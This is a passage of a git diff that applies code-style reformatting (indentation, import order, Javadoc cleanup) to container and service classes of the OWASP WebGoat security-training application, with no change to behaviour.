-            paths = ArrayUtils.addAll(m.getAnnotation(PostMapping.class).value(), m.getAnnotation(PostMapping.class).path());
-        } else if (m.getAnnotation(GetMapping.class) != null) {
-            paths = ArrayUtils.addAll(m.getAnnotation(GetMapping.class).value(), m.getAnnotation(GetMapping.class).path());
-        } else if (m.getAnnotation(PutMapping.class) != null) {
-            paths = ArrayUtils.addAll(m.getAnnotation(PutMapping.class).value(), m.getAnnotation(PutMapping.class).path());
-        }
-        if (paths == null) {
-            return null;
-        } else {
-            return Arrays.stream(paths).filter(path -> !"".equals(path)).findFirst().orElse("");
-        }
+  private String getMapping(Method m) {
+    String[] paths = null;
+    // Find the path, either it is @GetMapping("/attack") of GetMapping(path = "/attack") both are
+    // valid, we need to consider both
+    if (m.getAnnotation(RequestMapping.class) != null) {
+      paths =
+          ArrayUtils.addAll(
+              m.getAnnotation(RequestMapping.class).value(),
+              m.getAnnotation(RequestMapping.class).path());
+    } else if (m.getAnnotation(PostMapping.class) != null) {
+      paths =
+          ArrayUtils.addAll(
+              m.getAnnotation(PostMapping.class).value(),
+              m.getAnnotation(PostMapping.class).path());
+    } else if (m.getAnnotation(GetMapping.class) != null) {
+      paths =
+          ArrayUtils.addAll(
+              m.getAnnotation(GetMapping.class).value(), m.getAnnotation(GetMapping.class).path());
+    } else if (m.getAnnotation(PutMapping.class) != null) {
+      paths =
+          ArrayUtils.addAll(
+              m.getAnnotation(PutMapping.class).value(), m.getAnnotation(PutMapping.class).path());
     }
+    if (paths == null) {
+      return null;
+    } else {
+      return Arrays.stream(paths).filter(path -> !"".equals(path)).findFirst().orElse("");
+    }
+  }
 
-    private List<String> getHints(Class<? extends AssignmentEndpoint> e) {
-        if (e.isAnnotationPresent(AssignmentHints.class)) {
-            return List.of(e.getAnnotationsByType(AssignmentHints.class)[0].value());
-        }
-        return Collections.emptyList();
+  private List<String> getHints(Class<? extends AssignmentEndpoint> e) {
+    if (e.isAnnotationPresent(AssignmentHints.class)) {
+      return List.of(e.getAnnotationsByType(AssignmentHints.class)[0].value());
     }
+    return Collections.emptyList();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/Hint.java b/src/main/java/org/owasp/webgoat/container/lessons/Hint.java
index 8b61b904a..6a18d8f94 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/Hint.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Hint.java
@@ -1,28 +1,28 @@
 /***************************************************************************************************
- * 
- * 
+ *
+ *
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * 
+ *
  * Copyright (c) 2002 - 2014 Bruce Mayhew
- * 
+ *
  * This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * 
+ *
  * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
  * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
  * General Public License for more details.
- * 
+ *
  * You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * 
+ *
  * Getting Source ==============
- * 
+ *
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
  * projects.
- * 
+ *
  */
 
 package org.owasp.webgoat.container.lessons;
@@ -30,7 +30,7 @@ package org.owasp.webgoat.container.lessons;
 import lombok.Value;
 
 /**
- * <p>Hint class.</p>
+ * Hint class.
  *
  * @author rlawson
  * @version $Id: $Id
@@ -38,6 +38,6 @@ import lombok.Value;
 @Value
 public class Hint {
 
-    private String hint;
-    private String assignmentPath;
+  private String hint;
+  private String assignmentPath;
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java b/src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java
index 6c810d7ca..2a9726b6f 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Initializeable.java
@@ -3,10 +3,10 @@ package org.owasp.webgoat.container.lessons;
 import org.owasp.webgoat.container.users.WebGoatUser;
 
 /**
- * Interface for initialization of a lesson. It is called when a new user is added to WebGoat and when a users
- * reset a lesson. Make sure to clean beforehand and then re-initialize the lesson.
+ * Interface for initialization of a lesson. It is called when a new user is added to WebGoat and
+ * when a users reset a lesson. Make sure to clean beforehand and then re-initialize the lesson.
  */
 public interface Initializeable {
 
-    void initialize(WebGoatUser webGoatUser);
+  void initialize(WebGoatUser webGoatUser);
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/Lesson.java b/src/main/java/org/owasp/webgoat/container/lessons/Lesson.java
index 91c0743e7..18f031c93 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/Lesson.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/Lesson.java
@@ -22,115 +22,103 @@
 
 package org.owasp.webgoat.container.lessons;
 
+import java.util.List;
 import lombok.Getter;
 import lombok.Setter;
 
-import java.util.List;
-
 @Getter
 @Setter
 public abstract class Lesson {
 
-    private static int count = 1;
-    private Integer id = null;
-    private List<Assignment> assignments;
+  private static int count = 1;
+  private Integer id = null;
+  private List<Assignment> assignments;
 
-    /**
-     * Constructor for the Lesson object
-     */
-    protected Lesson() {
-        id = ++count;
-    }
+  /** Constructor for the Lesson object */
+  protected Lesson() {
+    id = ++count;
+  }
 
+  /**
+   * getName.
+   *
+   * @return a {@link java.lang.String} object.
+   */
+  public String getName() {
+    String className = getClass().getName();
+    return className.substring(className.lastIndexOf('.') + 1);
+  }
 
-    /**
-     * <p>getName.</p>
-     *
-     * @return a {@link java.lang.String} object.
-     */
-    public String getName() {
-        String className = getClass().getName();
-        return className.substring(className.lastIndexOf('.') + 1);
-    }
+  /**
+   * Gets the category attribute of the Lesson object
+   *
+   * @return The category value
+   */
+  public Category getCategory() {
+    return getDefaultCategory();
+  }
 
-    /**
-     * Gets the category attribute of the Lesson object
-     *
-     * @return The category value
-     */
-    public Category getCategory() {
-        return getDefaultCategory();
-    }
+  /**
+   * getDefaultCategory.
+   *
+   * @return a {@link org.owasp.webgoat.container.lessons.Category} object.
+   */
+  protected abstract Category getDefaultCategory();
 
-    /**
-     * <p>getDefaultCategory.</p>
-     *
-     * @return a {@link org.owasp.webgoat.container.lessons.Category} object.
-     */
-    protected abstract Category getDefaultCategory();
+  /**
+   * Gets the title attribute of the HelloScreen object
+   *
+   * @return The title value
+   */
+  public abstract String getTitle();
 
-    /**
-     * Gets the title attribute of the HelloScreen object
-     *
-     * @return The title value
-     */
-    public abstract String getTitle();
+  /**
+   * Returns the default "path" portion of a lesson's URL.
+   *
+   * <p>
+   *
+   * <p>Legacy webgoat lesson links are of the form "attack?Screen=Xmenu=Ystage=Z". This method
+   * returns the path portion of the url, i.e., "attack" in the string above.
+   *
+   * <p>Newer, Spring-Controller-based classes will override this method to return "*.do"-styled
+   * paths.
+   *
+   * @return a {@link java.lang.String} object.
+   */
+  protected String getPath() {
+    return "#lesson/";
+  }
 
-    /**
-     * <p>Returns the default "path" portion of a lesson's URL.</p>
-     * <p>
-     * <p>
-     * Legacy webgoat lesson links are of the form
-     * "attack?Screen=Xmenu=Ystage=Z". This method returns the path portion of
-     * the url, i.e., "attack" in the string above.
-     * <p>
-     * Newer, Spring-Controller-based classes will override this method to
-     * return "*.do"-styled paths.
-     *
-     * @return a {@link java.lang.String} object.
-     */
-    protected String getPath() {
-        return "#lesson/";
-    }
-
-    /**
-     * Get the link that can be used to request this screen.
-     * <p>
-     * Rendering the link in the browser may result in Javascript sending
-     * additional requests to perform necessary actions or to obtain data
-     * relevant to the lesson or the element of the lesson selected by the
-     * user.  Thanks to using the hash mark "#" and Javascript handling the
-     * clicks, the user will experience less waiting as the pages do not have
-     * to reload entirely.
-     *
-     * @return a {@link java.lang.String} object.
-     */
-    public String getLink() {
-        return String.format("%s%s.lesson", getPath(), getId());
-    }
-
-    /**
-     * Description of the Method
-     *
-     * @return Description of the Return Value
-     */
-    public String toString() {
-        return getTitle();
-    }
-
-    public final String getId() {
-        return this.getClass().getSimpleName();
-    }
-
-    public final String getPackage() {
-        var packageName = this.getClass().getPackageName();
-        //package name is the direct package name below lessons (any subpackage will be removed)
-        return packageName.replaceAll("org.owasp.webgoat.lessons.", "").replaceAll("\\..*", "");
-
-
-
-    }
+  /**
+   * Get the link that can be used to request this screen.
+   *
+   * <p>Rendering the link in the browser may result in Javascript sending additional requests to
+   * perform necessary actions or to obtain data relevant to the lesson or the element of the lesson
+   * selected by the user. Thanks to using the hash mark "#" and Javascript handling the clicks, the
+   * user will experience less waiting as the pages do not have to reload entirely.
+   *
+   * @return a {@link java.lang.String} object.
+   */
+  public String getLink() {
+    return String.format("%s%s.lesson", getPath(), getId());
+  }
 
+  /**
+   * Description of the Method
+   *
+   * @return Description of the Return Value
+   */
+  public String toString() {
+    return getTitle();
+  }
 
+  public final String getId() {
+    return this.getClass().getSimpleName();
+  }
 
+  public final String getPackage() {
+    var packageName = this.getClass().getPackageName();
+    // package name is the direct package name below lessons (any subpackage will be removed)
+    return packageName.replaceAll("org.owasp.webgoat.lessons.", "").replaceAll("\\..*", "");
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/LessonConnectionInvocationHandler.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonConnectionInvocationHandler.java
index fa2643eff..3b90c963d 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/LessonConnectionInvocationHandler.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonConnectionInvocationHandler.java
@@ -1,39 +1,38 @@
 package org.owasp.webgoat.container.lessons;
 
-import lombok.extern.slf4j.Slf4j;
-import org.owasp.webgoat.container.users.WebGoatUser;
-import org.springframework.security.core.context.SecurityContextHolder;
-
 import java.lang.reflect.InvocationHandler;
 import java.lang.reflect.InvocationTargetException;
 import java.lang.reflect.Method;
 import java.sql.Connection;
+import lombok.extern.slf4j.Slf4j;
+import org.owasp.webgoat.container.users.WebGoatUser;
+import org.springframework.security.core.context.SecurityContextHolder;
 
 /**
- * Handler which sets the correct schema for the currently bounded user. This way users are not seeing each other
- * data and we can reset data for just one particular user.
+ * Handler which sets the correct schema for the currently bounded user. This way users are not
+ * seeing each other data and we can reset data for just one particular user.
  */
 @Slf4j
 public class LessonConnectionInvocationHandler implements InvocationHandler {
 
-    private final Connection targetConnection;
+  private final Connection targetConnection;
 
-    public LessonConnectionInvocationHandler(Connection targetConnection) {
-        this.targetConnection = targetConnection;
-    }
+  public LessonConnectionInvocationHandler(Connection targetConnection) {
+    this.targetConnection = targetConnection;
+  }
 
-    @Override
-    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
-        var authentication = SecurityContextHolder.getContext().getAuthentication();
-        if (authentication != null && authentication.getPrincipal() instanceof WebGoatUser user) {
-            try (var statement = targetConnection.createStatement()) {
-                statement.execute("SET SCHEMA \"" + user.getUsername() + "\"");
-            }
-        }
-        try {
-            return method.invoke(targetConnection, args);
-        } catch (InvocationTargetException e) {
-            throw e.getTargetException();
-        }
+  @Override
+  public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
+    var authentication = SecurityContextHolder.getContext().getAuthentication();
+    if (authentication != null && authentication.getPrincipal() instanceof WebGoatUser user) {
+      try (var statement = targetConnection.createStatement()) {
+        statement.execute("SET SCHEMA \"" + user.getUsername() + "\"");
+      }
     }
+    try {
+      return method.invoke(targetConnection, args);
+    } catch (InvocationTargetException e) {
+      throw e.getTargetException();
+    }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/LessonInfoModel.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonInfoModel.java
index 3c77ce095..9a56859ba 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/LessonInfoModel.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonInfoModel.java
@@ -4,7 +4,7 @@ import lombok.AllArgsConstructor;
 import lombok.Getter;
 
 /**
- * <p>LessonInfoModel class.</p>
+ * LessonInfoModel class.
  *
  * @author dm
  * @version $Id: $Id
@@ -13,9 +13,8 @@ import lombok.Getter;
 @AllArgsConstructor
 public class LessonInfoModel {
 
-    private String lessonTitle;
-    private boolean hasSource;
-    private boolean hasSolution;
-    private boolean hasPlan;
-
+  private String lessonTitle;
+  private boolean hasSource;
+  private boolean hasSolution;
+  private boolean hasPlan;
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItem.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItem.java
index 6133e8c06..2b956a6b7 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItem.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItem.java
@@ -1,166 +1,162 @@
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at
- * https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  */
-
 package org.owasp.webgoat.container.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
 
 /**
- * <p>LessonMenuItem class.</p>
+ * LessonMenuItem class.
  *
  * @author rlawson
  * @version $Id: $Id
  */
 public class LessonMenuItem {
 
-    private String name;
-    private LessonMenuItemType type;
-    private List<LessonMenuItem> children = new ArrayList<>();
-    private boolean complete;
-    private String link;
-    private int ranking;
+  private String name;
+  private LessonMenuItemType type;
+  private List<LessonMenuItem> children = new ArrayList<>();
+  private boolean complete;
+  private String link;
+  private int ranking;
 
-    /**
-     * <p>Getter for the field <code>name</code>.</p>
-     *
-     * @return the name
-     */
-    public String getName() {
-        return name;
-    }
+  /**
+   * Getter for the field <code>name</code>.
+   *
+   * @return the name
+   */
+  public String getName() {
+    return name;
+  }
 
-    /**
-     * <p>Setter for the field <code>name</code>.</p>
-     *
-     * @param name the name to set
-     */
-    public void setName(String name) {
-        this.name = name;
-    }
+  /**
+   * Setter for the field <code>name</code>.
+   *
+   * @param name the name to set
+   */
+  public void setName(String name) {
+    this.name = name;
+  }
 
-    /**
-     * <p>Getter for the field <code>children</code>.</p>
-     *
-     * @return the children
-     */
-    public List<LessonMenuItem> getChildren() {
-        return children;
-    }
+  /**
+   * Getter for the field <code>children</code>.
+   *
+   * @return the children
+   */
+  public List<LessonMenuItem> getChildren() {
+    return children;
+  }
 
-    /**
-     * <p>Setter for the field <code>children</code>.</p>
-     *
-     * @param children the children to set
-     */
-    public void setChildren(List<LessonMenuItem> children) {
-        this.children = children;
-    }
+  /**
+   * Setter for the field <code>children</code>.
+   *
+   * @param children the children to set
+   */
+  public void setChildren(List<LessonMenuItem> children) {
+    this.children = children;
+  }
 
-    /**
-     * <p>Getter for the field <code>type</code>.</p>
-     *
-     * @return the type
-     */
-    public LessonMenuItemType getType() {
-        return type;
-    }
+  /**
+   * Getter for the field <code>type</code>.
+   *
+   * @return the type
+   */
+  public LessonMenuItemType getType() {
+    return type;
+  }
 
-    /**
-     * <p>Setter for the field <code>type</code>.</p>
-     *
-     * @param type the type to set
-     */
-    public void setType(LessonMenuItemType type) {
-        this.type = type;
-    }
+  /**
+   * Setter for the field <code>type</code>.
+   *
+   * @param type the type to set
+   */
+  public void setType(LessonMenuItemType type) {
+    this.type = type;
+  }
 
-    /**
-     * <p>addChild.</p>
-     *
-     * @param child a {@link LessonMenuItem} object.
-     */
-    public void addChild(LessonMenuItem child) {
-        children.add(child);
-    }
+  /**
+   * addChild.
+   *
+   * @param child a {@link LessonMenuItem} object.
+   */
+  public void addChild(LessonMenuItem child) {
+    children.add(child);
+  }
 
-    @Override
-    public String toString() {
-        StringBuilder bldr = new StringBuilder();
-        bldr.append("Name: ").append(name).append(" | ");
-        bldr.append("Type: ").append(type).append(" | ");
-        return bldr.toString();
-    }
+  @Override
+  public String toString() {
+    StringBuilder bldr = new StringBuilder();
+    bldr.append("Name: ").append(name).append(" | ");
+    bldr.append("Type: ").append(type).append(" | ");
+    return bldr.toString();
+  }
 
-    /**
-     * <p>isComplete.</p>
-     *
-     * @return the complete
-     */
-    public boolean isComplete() {
-        return complete;
-    }
+  /**
+   * isComplete.
+   *
+   * @return the complete
+   */
+  public boolean isComplete() {
+    return complete;
+  }
 
-    /**
-     * <p>Setter for the field <code>complete</code>.</p>
-     *
-     * @param complete the complete to set
-     */
-    public void setComplete(boolean complete) {
-        this.complete = complete;
-    }
+  /**
+   * Setter for the field <code>complete</code>.
+   *
+   * @param complete the complete to set
+   */
+  public void setComplete(boolean complete) {
+    this.complete = complete;
+  }
 
-    /**
-     * <p>Getter for the field <code>link</code>.</p>
-     *
-     * @return the link
-     */
-    public String getLink() {
-        return link;
-    }
+  /**
+   * Getter for the field <code>link</code>.
+   *
+   * @return the link
+   */
+  public String getLink() {
+    return link;
+  }
 
-    /**
-     * <p>Setter for the field <code>link</code>.</p>
-     *
-     * @param link the link to set
-     */
-    public void setLink(String link) {
-        this.link = link;
-    }
-
-    public void setRanking(int ranking) {
-        this.ranking = ranking;
-    }
-
-    public int getRanking() {
-        return this.ranking;
-    }
+  /**
+   * Setter for the field <code>link</code>.
+   *
+   * @param link the link to set
+   */
+  public void setLink(String link) {
+    this.link = link;
+  }
 
+  public void setRanking(int ranking) {
+    this.ranking = ranking;
+  }
 
+  public int getRanking() {
+    return this.ranking;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItemType.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItemType.java
index e29cce641..0ce6b660a 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItemType.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonMenuItemType.java
@@ -1,40 +1,40 @@
 /***************************************************************************************************
- * 
- * 
+ *
+ *
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * 
+ *
  * Copyright (c) 2002 - 2014 Bruce Mayhew
- * 
+ *
  * This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * 
+ *
  * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
  * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
  * General Public License for more details.
- * 
+ *
  * You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * 
+ *
  * Getting Source ==============
- * 
+ *
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
  * projects.
- * 
+ *
  */
 
 package org.owasp.webgoat.container.lessons;
 
 /**
- * <p>LessonMenuItemType class.</p>
+ * LessonMenuItemType class.
  *
  * @author rlawson
  * @version $Id: $Id
  */
 public enum LessonMenuItemType {
-    CATEGORY,
-    LESSON,
-    STAGE
+  CATEGORY,
+  LESSON,
+  STAGE
 }
diff --git a/src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java b/src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java
index 5f9fb86af..e21baef30 100644
--- a/src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java
+++ b/src/main/java/org/owasp/webgoat/container/lessons/LessonScanner.java
@@ -1,46 +1,42 @@
 package org.owasp.webgoat.container.lessons;
 
-import lombok.Getter;
-import lombok.extern.slf4j.Slf4j;
-import org.springframework.core.io.ClassPathResource;
-import org.springframework.core.io.support.ResourcePatternResolver;
-import org.springframework.stereotype.Component;
-
 import java.io.IOException;
-import java.util.ArrayList;
 import java.util.HashSet;
 import java.util.List;
 import java.util.Set;
 import java.util.regex.Pattern;
+import lombok.Getter;
+import lombok.extern.slf4j.Slf4j;
+import org.springframework.core.io.support.ResourcePatternResolver;
+import org.springframework.stereotype.Component;
 
 @Component
 @Slf4j
 public class LessonScanner {
 
-    private static final Pattern lessonPattern = Pattern.compile("^.*/lessons/([^/]*)/.*$");
+  private static final Pattern lessonPattern = Pattern.compile("^.*/lessons/([^/]*)/.*$");
 
-    @Getter
-    private final Set<String> lessons = new HashSet<>();
+  @Getter private final Set<String> lessons = new HashSet<>();
 
-    public LessonScanner(ResourcePatternResolver resourcePatternResolver) {
-        try {
-            var resources = resourcePatternResolver.getResources("classpath:/lessons/*/*");
-            for (var resource : resources) {
-                //WG can run as a fat jar or as directly from file system we need to support both so use the URL
-                var url = resource.getURL();
-                var matcher = lessonPattern.matcher(url.toString());
-                if (matcher.matches()) {
-                    lessons.add(matcher.group(1));
-                }
-            }
-            log.debug("Found {} lessons", lessons.size());
-        } catch (IOException e) {
-            log.warn("No lessons found...");
+  public LessonScanner(ResourcePatternResolver resourcePatternResolver) {
+    try {
+      var resources = resourcePatternResolver.getResources("classpath:/lessons/*/*");
+      for (var resource : resources) {
+        // WG can run as a fat jar or as directly from file system we need to support both so use
+        // the URL
+        var url = resource.getURL();
+        var matcher = lessonPattern.matcher(url.toString());
+        if (matcher.matches()) {
+          lessons.add(matcher.group(1));
         }
-
+      }
+      log.debug("Found {} lessons", lessons.size());
+    } catch (IOException e) {
+      log.warn("No lessons found...");
     }
+  }
 
-    public List<String> applyPattern(String pattern) {
-        return lessons.stream().map(lesson -> String.format(pattern, lesson)).toList();
-    }
+  public List<String> applyPattern(String pattern) {
+    return lessons.stream().map(lesson -> String.format(pattern, lesson)).toList();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java b/src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java
index 4ab4967af..6393de391 100644
--- a/src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/EnvironmentService.java
@@ -9,11 +9,10 @@ import org.springframework.web.bind.annotation.RestController;
 @RequiredArgsConstructor
 public class EnvironmentService {
 
-    private final ApplicationContext context;
-
-    @GetMapping("/server-directory")
-    public String homeDirectory() {
-        return context.getEnvironment().getProperty("webgoat.server.directory");
-    }
+  private final ApplicationContext context;
 
+  @GetMapping("/server-directory")
+  public String homeDirectory() {
+    return context.getEnvironment().getProperty("webgoat.server.directory");
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/HintService.java b/src/main/java/org/owasp/webgoat/container/service/HintService.java
index a0fc4da83..d9ee5be25 100644
--- a/src/main/java/org/owasp/webgoat/container/service/HintService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/HintService.java
@@ -6,6 +6,8 @@
 
 package org.owasp.webgoat.container.service;
 
+import java.util.Collection;
+import java.util.List;
 import org.owasp.webgoat.container.lessons.Assignment;
 import org.owasp.webgoat.container.lessons.Hint;
 import org.owasp.webgoat.container.lessons.Lesson;
@@ -14,11 +16,8 @@ import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.util.Collection;
-import java.util.List;
-
 /**
- * <p>HintService class.</p>
+ * HintService class.
  *
  * @author rlawson
  * @version $Id: $Id
@@ -26,36 +25,33 @@ import java.util.List;
 @RestController
 public class HintService {
 
-    public static final String URL_HINTS_MVC = "/service/hint.mvc";
-    private final WebSession webSession;
+  public static final String URL_HINTS_MVC = "/service/hint.mvc";
+  private final WebSession webSession;
 
-    public HintService(WebSession webSession) {
-        this.webSession = webSession;
-    }
+  public HintService(WebSession webSession) {
+    this.webSession = webSession;
+  }
 
-    /**
-     * Returns hints for current lesson
-     *
-     * @return a {@link java.util.List} object.
-     */
-    @GetMapping(path = URL_HINTS_MVC, produces = "application/json")
-    @ResponseBody
-    public List<Hint> getHints() {
-        Lesson l = webSession.getCurrentLesson();
-        return createAssignmentHints(l);
-    }
+  /**
+   * Returns hints for current lesson
+   *
+   * @return a {@link java.util.List} object.
+   */
+  @GetMapping(path = URL_HINTS_MVC, produces = "application/json")
+  @ResponseBody
+  public List<Hint> getHints() {
+    Lesson l = webSession.getCurrentLesson();
+    return createAssignmentHints(l);
+  }
 
-    private List<Hint> createAssignmentHints(Lesson l) {
-        if (l != null) {
-            return l.getAssignments().stream()
-                    .map(this::createHint)
-                    .flatMap(Collection::stream)
-                    .toList();
-        }
-        return List.of();
+  private List<Hint> createAssignmentHints(Lesson l) {
+    if (l != null) {
+      return l.getAssignments().stream().map(this::createHint).flatMap(Collection::stream).toList();
     }
+    return List.of();
+  }
 
-    private List<Hint> createHint(Assignment a) {
-        return a.getHints().stream().map(h -> new Hint(h, a.getPath())).toList();
-    }
+  private List<Hint> createHint(Assignment a) {
+    return a.getHints().stream().map(h -> new Hint(h, a.getPath())).toList();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/container/service/LabelDebugService.java b/src/main/java/org/owasp/webgoat/container/service/LabelDebugService.java
index 2c23ceac2..c91aeb1ae 100644
--- a/src/main/java/org/owasp/webgoat/container/service/LabelDebugService.java
+++ b/src/main/java/org/owasp/webgoat/container/service/LabelDebugService.java
@@ -1,34 +1,33 @@
 /**
  * *************************************************************************************************
+ *
  * <p>
- * <p>
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * <p>
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at
- * https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ *
+ * <p>This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
  */
-
 package org.owasp.webgoat.container.service;
 
+import java.util.Map;
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.session.LabelDebugger;
@@ -40,10 +39,8 @@ import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 
-import java.util.Map;
-
 /**
- * <p>LabelDebugService class.</p>
+ * LabelDebugService class.
  *
  * @author nbaars
  * @version $Id: $Id
@@ -53,45 +50,47 @@ import java.util.Map;
 @AllArgsConstructor
 public class LabelDebugService {
 
-    private static final String URL_DEBUG_LABELS_MVC = "/service/debug/labels.mvc";
-    private static final String KEY_ENABLED = "enabled";
-    private static final String KEY_SUCCESS = "success";
+  private static final String URL_DEBUG_LABELS_MVC = "/service/debug/labels.mvc";
+  private static final String KEY_ENABLED = "enabled";
+  private static final String KEY_SUCCESS = "success";
 
-    private LabelDebugger labelDebugger;
+  private LabelDebugger labelDebugger;
 
-    /**
-     * Checks if debugging of labels is enabled or disabled
-     *
-     * @return a {@link org.springframework.http.ResponseEntity} object.
-     */
-    @RequestMapping(path = URL_DEBUG_LABELS_MVC, produces = MediaType.APPLICATION_JSON_VALUE)
-    public @ResponseBody
-    ResponseEntity<Map<String, Object>> checkDebuggingStatus() {
